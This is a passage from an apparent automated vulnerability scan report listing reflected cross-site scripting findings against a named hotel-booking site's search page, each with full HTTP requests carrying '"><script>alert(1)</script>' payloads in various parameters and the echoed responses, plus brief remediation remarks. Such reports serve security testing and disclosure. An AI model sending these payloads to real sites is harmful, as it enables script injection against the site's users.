4destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:12:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:12:43 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228301


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1d0c52"><script>alert(1)</script>4bf2e57ade7&State=Massachusetts&Country=United%20States&sc=IGoUGo', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.264. http://www.hotelplanner.com/Search/Index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e5a"><script>alert(1)</script>8b5edb22f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo&14e5a"><script>alert(1)</script>8b5edb22f8=1 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:13:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:13:31 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228455


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo&14e5a"><script>alert(1)</script>8b5edb22f8=1', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.265. http://www.hotelplanner.com/Search/Index.cfm [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50051"><script>alert(1)</script>39edeb187e was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response also writes the submitted sc value into the SOURCECODE cookie, URL-encoded and with an expiry of 31 March 2012 (see the Set-Cookie header below), so the tainted value persists in the browser well beyond this request. Whether it is later read back from the cookie and reflected unencoded is not shown in this report; it is the first thing to check when retesting.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo50051"><script>alert(1)</script>39edeb187e HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:13:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo50051%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E39edeb187e;expires=Sat, 31-Mar-2012 00:13:16 GMT;path=/
Vary: Accept-Encoding
Content-Length: 228230


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
k="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo50051"><script>alert(1)</script>39edeb187e', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.266. http://www.hotelplanner.com/Search/index.cfm [HotelName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the HotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fa49"><script>alert(1)</script>5eb5ba7635c was submitted in the HotelName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=3fa49"><script>alert(1)</script>5eb5ba7635c&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 118577


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
t="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=3fa49"><script>alert(1)</script>5eb5ba7635c&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.267. http://www.hotelplanner.com/Search/index.cfm [NumRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the NumRooms request parameter is copied into the HTML document as plain text between tags. The payload 919fb<script>alert(1)</script>49f0b73eca3 was submitted in the NumRooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Unlike the other /Search findings in this report, the sink here is a text node (the "Check instant online group rates for N rooms" heading in the response excerpt below), so the payload needs no closing quote and entity-encoding < and > is enough to neutralise it. NumRooms is also a count, so rejecting anything that is not a small positive integer closes this one before the value reaches the template.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=919fb<script>alert(1)</script>49f0b73eca3&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:35 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 74239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Boston, MA Group Hotels - Discount Group Travel Hotel Rates + Reservations</title>
       <meta http-equiv="Con
...[SNIP]...
<strong>Check instant online group rates for 919fb<script>alert(1)</script>49f0b73eca3 rooms</strong>
...[SNIP]...

4.268. http://www.hotelplanner.com/Search/index.cfm [PriceMax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the PriceMax request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37d6b"><script>alert(1)</script>cd6e8673d05 was submitted in the PriceMax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=999937d6b"><script>alert(1)</script>cd6e8673d05&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:54 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
rn addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=999937d6b"><script>alert(1)</script>cd6e8673d05&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.269. http://www.hotelplanner.com/Search/index.cfm [PriceMin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the PriceMin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41bab"><script>alert(1)</script>67b3aa74a1b was submitted in the PriceMin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=141bab"><script>alert(1)</script>67b3aa74a1b&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:49 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=141bab"><script>alert(1)</script>67b3aa74a1b&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.270. http://www.hotelplanner.com/Search/index.cfm [Rating parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the Rating request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ead4"><script>alert(1)</script>4ef82785e9c was submitted in the Rating parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=8ead4"><script>alert(1)</script>4ef82785e9c&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:45 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 118534


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
is_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=8ead4"><script>alert(1)</script>4ef82785e9c&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.271. http://www.hotelplanner.com/Search/index.cfm [ViewType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the ViewType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c47"><script>alert(1)</script>36f36986939 was submitted in the ViewType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=Listf4c47"><script>alert(1)</script>36f36986939&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:22:39 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 155889


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=Listf4c47"><script>alert(1)</script>36f36986939&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...

4.272. http://www.hotelplanner.com/Search/index.cfm [btnGo.x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the btnGo.x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a9e"><script>alert(1)</script>75d130eda71 was submitted in the btnGo.x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113c7a9e"><script>alert(1)</script>75d130eda71&btnGo.y=15 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
